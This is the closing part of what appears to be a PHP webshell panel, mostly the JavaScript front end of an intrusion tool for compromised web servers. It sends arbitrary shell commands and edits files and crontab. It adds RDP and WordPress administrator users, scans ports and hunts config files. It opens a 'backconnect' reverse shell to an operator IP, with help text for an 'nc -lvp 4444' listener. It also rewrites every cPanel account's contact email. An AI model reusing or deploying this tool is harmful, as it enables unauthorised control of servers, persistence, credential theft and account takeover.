.catch(error => {
alert('Error: ' + error);
});
}
function extractZip() {
const zipFile = document.getElementById('unzipFileSelect').value;
const extractPath = document.getElementById('unzipPath').value;
if (!zipFile) {
alert('Please select a zip file');
return;
}
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=unzip_file&zip_file=${encodeURIComponent(zipFile)}&extract_path=${encodeURIComponent(extractPath)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('Zip file extracted successfully: ' + data.output);
closeModal('unzipModal');
setTimeout(() => {
window.location.reload();
}, 1000);
} else {
alert('Error extracting zip: ' + data.output);
}
})
.catch(error => {
alert('Error: ' + error);
});
}
function addRdpUser() {
const username = document.getElementById('rdpUsername').value;
const password = document.getElementById('rdpPassword').value;
if (!username || !password) {
alert('Please enter both username and password');
return;
}
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=add_rdp_user&username=${encodeURIComponent(username)}&password=${encodeURIComponent(password)}`
})
.then(response => response.json())
.then(data => {
const output = document.getElementById('rdpManagerOutput');
if (data.success) {
output.innerHTML = `<div style="color: #28a745;">${data.output}</div>`;
} else {
output.innerHTML = `<div style="color: #dc3545;">${data.output}</div>`;
}
})
.catch(error => {
document.getElementById('rdpManagerOutput').innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function enableRdp() {
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: 'ajax=true&action=enable_rdp'
})
.then(response => response.json())
.then(data => {
const output = document.getElementById('rdpManagerOutput');
if (data.success) {
output.innerHTML = `<div style="color: #28a745;">${data.output}</div>`;
} else {
output.innerHTML = `<div style="color: #dc3545;">${data.output}</div>`;
}
})
.catch(error => {
document.getElementById('rdpManagerOutput').innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function executeCommand(cmd = null) {
const terminalInput = document.getElementById('terminalInput');
const executeBtn = document.getElementById('executeBtn');
const command = cmd || terminalInput.value.trim();
if (!command) return;
if (!commandHistory.includes(command)) {
commandHistory.unshift(command);
if (commandHistory.length > 20) {
commandHistory.pop();
}
localStorage.setItem('commandHistory', JSON.stringify(commandHistory));
updateCommandHistoryDisplay();
}
terminalInput.value = '';
executeBtn.disabled = true;
executeBtn.textContent = 'Executing...';
const terminalOutput = document.getElementById('terminalOutput');
terminalOutput.innerHTML += `<div class="terminal-prompt">$ ${command}</div>`;
terminalOutput.scrollTop = terminalOutput.scrollHeight;
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=execute_command&command=${encodeURIComponent(command)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
terminalOutput.innerHTML += `<div class="terminal-output-line">${data.output}</div>`;
} else {
terminalOutput.innerHTML += `<div class="terminal-output-line" style="color: #dc3545;">Error: ${data.output}</div>`;
}
terminalOutput.scrollTop = terminalOutput.scrollHeight;
})
.catch(error => {
terminalOutput.innerHTML += `<div class="terminal-output-line" style="color: #dc3545;">Network error: ${error}</div>`;
terminalOutput.scrollTop = terminalOutput.scrollHeight;
})
.finally(() => {
executeBtn.disabled = false;
executeBtn.textContent = 'Execute';
terminalInput.focus();
currentHistoryIndex = -1;
});
}
function executeCommandWithDir(cmd) {
const currentDir = '<?php echo addslashes($current_dir); ?>';
const command = `cd "${currentDir}" && ${cmd}`;
executeCommand(command);
}
function insertCommonCommandWithDir(cmd) {
const terminalInput = document.getElementById('terminalInput');
terminalInput.value = cmd;
terminalInput.focus();
}
function clearTerminal() {
document.getElementById('terminalOutput').innerHTML = '<div>// Terminal cleared</div>';
}
function insertCommonCommand(cmd) {
const terminalInput = document.getElementById('terminalInput');
terminalInput.value = cmd;
terminalInput.focus();
}
function updateCommandHistoryDisplay() {
const historyContainer = document.getElementById('commandHistory');
if (historyContainer && commandHistory.length > 0) {
historyContainer.innerHTML = '<strong>Command History:</strong><br>' +
commandHistory.slice(0, 5).map((cmd, index) =>
`<div class="command-item" onclick="insertCommonCommand('${cmd.replace(/'/g, "\\'")}')">${cmd}</div>`
).join('');
}
}
function navigateHistory(direction) {
if (commandHistory.length === 0) return;
const terminalInput = document.getElementById('terminalInput');
if (currentHistoryIndex === -1) {
currentHistoryIndex = direction === -1 ? 0 : commandHistory.length - 1;
} else {
currentHistoryIndex += direction;
if (currentHistoryIndex < 0) currentHistoryIndex = commandHistory.length - 1;
if (currentHistoryIndex >= commandHistory.length) currentHistoryIndex = 0;
}
terminalInput.value = commandHistory[currentHistoryIndex];
}
function editFile(filepath) {
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=get_file_content&filepath=${encodeURIComponent(filepath)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
document.getElementById('editFilePath').value = filepath;
document.getElementById('editFileName').textContent = filepath.split('/').pop();
document.getElementById('editFileContent').value = data.content;
document.getElementById('editModal').style.display = 'block';
} else {
alert('Error loading file: ' + data.error);
}
})
.catch(error => {
alert('Error loading file: ' + error);
});
}
function saveFile() {
const filepath = document.getElementById('editFilePath').value;
const content = document.getElementById('editFileContent').value;
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=save_file_content&filepath=${encodeURIComponent(filepath)}&content=${encodeURIComponent(content)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('File saved successfully!');
closeModal('editModal');
setTimeout(() => {
window.location.reload();
}, 500);
} else {
alert('Error saving file: ' + data.error);
}
})
.catch(error => {
alert('Error saving file: ' + error);
});
}
function chmodFile(filepath, currentPerm) {
var newPerm = prompt('Change permissions for:\n' + filepath + '\n\nCurrent: ' + currentPerm + '\nNew (e.g., 755):', currentPerm);
if (newPerm !== null && newPerm !== '') {
window.location.href = '?action=chmod&file=' + encodeURIComponent(filepath) + '&perm=' + newPerm + '&dir=' + encodeURIComponent('<?php echo $current_dir; ?>');
}
}
function renameFile(filepath) {
var newName = prompt('Rename file:\n' + filepath + '\n\nNew name:', filepath.split('/').pop());
if (newName !== null && newName !== '') {
var form = document.createElement('form');
form.method = 'post';
form.innerHTML = '<input type="hidden" name="action" value="rename">' +
'<input type="hidden" name="oldname" value="' + filepath + '">' +
'<input type="hidden" name="newname" value="' + filepath.replace(filepath.split('/').pop(), newName) + '">';
document.body.appendChild(form);
form.submit();
}
}
function deleteFile(filepath) {
if (confirm('Are you sure you want to delete:\n' + filepath + '?')) {
window.location.href = '?action=delete&file=' + encodeURIComponent(filepath) + '&dir=' + encodeURIComponent('<?php echo $current_dir; ?>');
}
}
function loadCrontab() {
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: 'ajax=true&action=view_crontab'
})
.then(response => response.json())
.then(data => {
const output = document.getElementById('crontabOutput');
const textarea = document.getElementById('crontabContent');
if (data.success) {
output.textContent = data.output;
textarea.value = data.output;
} else {
output.textContent = data.output;
textarea.value = data.output;
}
})
.catch(error => {
document.getElementById('crontabOutput').textContent = 'Error loading crontab: ' + error;
});
}
function saveCrontab() {
const content = document.getElementById('crontabContent').value;
if (!confirm('Are you sure you want to update crontab?')) {
return;
}
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=save_crontab&crontab_content=${encodeURIComponent(content)}`
})
.then(response => response.json())
.then(data => {
const output = document.getElementById('crontabOutput');
if (data.success) {
output.textContent = data.output;
alert('Crontab updated successfully!');
} else {
output.textContent = data.output;
alert('Error updating crontab!');
}
})
.catch(error => {
alert('Error saving crontab: ' + error);
});
}
function addCrontabExample() {
var example = "# Crontab Examples\n\n" +
"# Run every minute\n" +
"* * * * * /path/to/command\n\n" +
"# Run every day at 2:30 AM\n" +
"30 2 * * * /path/to/command\n\n" +
"# Run every Monday at 5 PM\n" +
"0 17 * * 1 /path/to/command\n\n" +
"# Run every 10 minutes\n" +
"*/10 * * * * /path/to/command\n\n" +
"# Run on reboot\n" +
"@reboot /path/to/command";
var textarea = document.getElementById('crontabContent');
textarea.value = textarea.value + '\n\n' + example;
}
function clearCrontab() {
if (confirm('Are you sure you want to clear the crontab content?')) {
document.getElementById('crontabContent').value = '';
}
}
function addWpUser() {
const form = document.getElementById('wpUserForm');
const formData = new FormData(form);
const data = {
username: formData.get('username'),
password: formData.get('password'),
email: formData.get('email'),
role: formData.get('role'),
wp_config_path: formData.get('wp_config_path')
};
if (!data.username || !data.password || !data.email || !data.wp_config_path) {
alert('All fields are required');
return;
}
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=add_wp_user&username=${encodeURIComponent(data.username)}&password=${encodeURIComponent(data.password)}&email=${encodeURIComponent(data.email)}&role=${encodeURIComponent(data.role)}&wp_config_path=${encodeURIComponent(data.wp_config_path)}`
})
.then(response => response.json())
.then(data => {
const output = document.getElementById('wpUserOutput');
if (data.success) {
output.innerHTML = `<div style="color: #28a745;">${data.output}</div>`;
} else {
output.innerHTML = `<div style="color: #dc3545;">${data.output}</div>`;
}
})
.catch(error => {
document.getElementById('wpUserOutput').innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function findWpConfig() {
executeCommand('find /var/www -name "wp-config.php" 2>/dev/null | head -10');
switchTab('terminal');
}
function scanPorts() {
const host = document.getElementById('scanHost').value || 'localhost';
const ports = document.getElementById('scanPorts').value || '21,22,23,25,53,80,110,443,3306,3389,5432';
const output = document.getElementById('portScannerOutput');
output.innerHTML = 'Scanning ports...';
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=scan_ports&host=${encodeURIComponent(host)}&ports=${encodeURIComponent(ports)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
output.innerHTML = data.output.split('\n').map(line => {
if (line.includes('OPEN')) {
return `<div style="color: #28a745;">${line}</div>`;
} else {
return `<div style="color: #6c757d;">${line}</div>`;
}
}).join('');
} else {
output.innerHTML = `<div style="color: #dc3545;">${data.output}</div>`;
}
})
.catch(error => {
output.innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function quickScan() {
document.getElementById('scanPorts').value = '21,22,80,443,3306,3389';
scanPorts();
}
function scanWebshells() {
const path = document.getElementById('scanPath').value || '/var/www';
const output = document.getElementById('webshellScannerOutput');
output.innerHTML = 'Scanning for webshells...';
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=scan_webshells&scan_path=${encodeURIComponent(path)}`
})
.then(response => response.json())
.then(data => {
const resultsDiv = document.getElementById('webshellResults');
resultsDiv.innerHTML = '';
if (data.success && data.files && data.files.length > 0) {
output.innerHTML = `Found ${data.files.length} suspicious files`;
data.files.forEach(file => {
const fileDiv = document.createElement('div');
fileDiv.className = 'webshell-item';
fileDiv.innerHTML = `
<strong>File:</strong> ${file.path}<br>
<strong>Size:</strong> ${file.size} bytes<br>
<strong>Patterns:</strong> ${file.patterns.join(', ')}<br>
<div style="margin-top: 10px;">
<button class="btn btn-danger btn-sm" onclick="deleteWebshell('${file.path.replace(/'/g, "\\'")}')">Delete</button>
<button class="btn btn-warning btn-sm" onclick="viewWebshellCode('${file.path.replace(/'/g, "\\'")}')">View Code</button>
</div>
`;
resultsDiv.appendChild(fileDiv);
});
} else {
output.innerHTML = 'No webshells found';
}
})
.catch(error => {
output.innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function deleteWebshell(filePath) {
if (!confirm('Are you sure you want to delete this file?')) {
return;
}
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=delete_webshell&file_path=${encodeURIComponent(filePath)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('File deleted successfully');
scanWebshells();
} else {
alert('Failed to delete file: ' + data.output);
}
})
.catch(error => {
alert('Error: ' + error);
});
}
function viewWebshellCode(filePath) {
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=get_webshell_code&file_path=${encodeURIComponent(filePath)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
const modal = document.createElement('div');
modal.className = 'modal';
modal.style.display = 'block';
modal.innerHTML = `
<div class="modal-content">
<h3>Webshell Code: ${filePath.split('/').pop()}</h3>
<div class="code-preview">${data.content.replace(/</g, '<').replace(/>/g, '>')}</div>
<div style="margin-top: 20px;">
<button class="btn btn-danger" onclick="this.closest('.modal').remove()">Close</button>
</div>
</div>
`;
document.body.appendChild(modal);
} else {
alert('Error loading file: ' + data.error);
}
})
.catch(error => {
alert('Error: ' + error);
});
}
function startBackconnect() {
const host = document.getElementById('backconnectHost').value;
const port = document.getElementById('backconnectPort').value || '4444';
if (!host) {
alert('Please enter your IP address');
return;
}
const output = document.getElementById('backconnectOutput');
output.innerHTML = 'Starting backconnect...';
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=backconnect&host=${encodeURIComponent(host)}&port=${encodeURIComponent(port)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
output.innerHTML = `<div style="color: #28a745;">${data.output}</div>`;
} else {
output.innerHTML = `<div style="color: #dc3545;">${data.output}</div>`;
}
})
.catch(error => {
output.innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function showBackconnectHelp() {
const output = document.getElementById('backconnectOutput');
output.innerHTML = `
<strong>Backconnect Help:</strong><br>
1. On your machine, run: <code>nc -lvp 4444</code><br>
2. Enter your IP address above<br>
3. Click "Start Backconnect"<br>
4. You should get a reverse shell connection<br><br>
<strong>Note:</strong> This requires outbound connections from the server.
`;
}
function scanConfigFiles() {
const path = document.getElementById('configScanPath').value || '/var/www';
const output = document.getElementById('configHunterOutput');
output.innerHTML = 'Scanning for config files...';
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=scan_config_files&scan_path=${encodeURIComponent(path)}`
})
.then(response => response.json())
.then(data => {
const resultsDiv = document.getElementById('configResults');
resultsDiv.innerHTML = '';
if (data.success && data.files && data.files.length > 0) {
output.innerHTML = `Found ${data.files.length} config files`;
data.files.forEach(file => {
const fileDiv = document.createElement('div');
fileDiv.className = 'config-item';
fileDiv.innerHTML = `
<strong>File:</strong> ${file.path}<br>
<strong>Size:</strong> ${file.size} bytes<br>
<strong>Modified:</strong> ${file.modified}<br>
<div style="margin-top: 10px;">
<button class="btn btn-info btn-sm" onclick="viewFileContent('${file.path.replace(/'/g, "\\'")}')">View</button>
</div>
`;
resultsDiv.appendChild(fileDiv);
});
} else {
output.innerHTML = 'No config files found';
}
})
.catch(error => {
output.innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function viewFileContent(filePath) {
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=get_file_content&filepath=${encodeURIComponent(filePath)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
const modal = document.createElement('div');
modal.className = 'modal';
modal.style.display = 'block';
modal.innerHTML = `
<div class="modal-content">
<h3>File Content: ${filePath.split('/').pop()}</h3>
<div class="code-preview">${data.content.replace(/</g, '<').replace(/>/g, '>')}</div>
<div style="margin-top: 20px;">
<button class="btn btn-danger" onclick="this.closest('.modal').remove()">Close</button>
</div>
</div>
`;
document.body.appendChild(modal);
} else {
alert('Error loading file: ' + data.error);
}
})
.catch(error => {
alert('Error: ' + error);
});
}
function resetCpanel() {
const email = document.getElementById('cpanelEmail').value;
if (!email) {
alert('Please enter an email address');
return;
}
if (!confirm('This will reset cPanel contact email for all users. Continue?')) {
return;
}
const output = document.getElementById('cpanelResetOutput');
output.innerHTML = 'Resetting cPanel emails...';
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=reset_cpanel&email=${encodeURIComponent(email)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
output.innerHTML = `<div style="color: #28a745;">${data.output}</div>`;
} else {
output.innerHTML = `<div style="color: #dc3545;">${data.output}</div>`;
}
})
.catch(error => {
output.innerHTML = `<div style="color: #dc3545;">Error: ${error}</div>`;
});
}
function showCpanelHelp() {
const output = document.getElementById('cpanelResetOutput');
output.innerHTML = `
<strong>cPanel Reset Help:</strong><br>
This feature resets the contact email in cPanel configuration files.<br>
It affects all users in /home/*/.cpanel/contactinfo<br><br>
<strong>Usage:</strong><br>
1. Enter the new email address<br>
2. Click "Reset cPanel Email"<br>
3. All cPanel accounts will use this email for contact
`;
}
</script>
</body>
</html>
<?php
function format_size($size) {
if ($size == 0) return '0 B';
$units = ['B', 'KB', 'MB', 'GB'];
$unit = 0;
while ($size >= 1024 && $unit < count($units) - 1) {
$size /= 1024;
$unit++;
}
return round($size, 2) . ' ' . $units[$unit];
}
?>